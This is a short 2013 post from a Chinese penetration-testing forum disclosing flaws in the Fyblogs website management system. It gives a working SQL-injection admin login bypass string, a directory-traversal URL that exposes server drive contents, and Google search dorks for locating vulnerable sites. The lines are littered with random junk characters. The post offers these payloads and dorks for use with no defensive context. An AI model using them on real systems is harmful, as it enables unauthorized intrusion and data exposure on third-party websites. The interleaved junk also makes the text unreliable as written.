中国网络渗透测试联盟

标题: Fyblogs网站管理系统漏洞 [打印本页]
作者: admin    时间: 2013-3-14 20:17
标题: Fyblogs网站管理系统漏洞
后台万能密码 'or'='or'
4 h- j) D- h8 ^4 x4 {, W0 A; R4 y) ?: z! X% E+ z% I
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!. I" @5 f" ^4 j6 Y+ f% ^6 f+ V
admin/uploadfile.asp?currentFolder=/upfiles/../: y& T  u; j9 Q+ v/ T. X6 x1 h
, ~, U" g& H% W( ~. q( F1 X, F: L
漏洞证明:( g. ]: S* ^6 |1 i4 e1 K% G* b' ~
3 T7 R" V2 Y: y+ {
谷歌:inurl:type.asp?id=1 新闻中心" ~4 x  J6 O0 K5 Z. x' k+ N1 }) x+ G
或者 :inurl:download_ok.asp?
$ l) e, @- t$ d
1 @. d  T/ g% H& U' y& e+ a



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2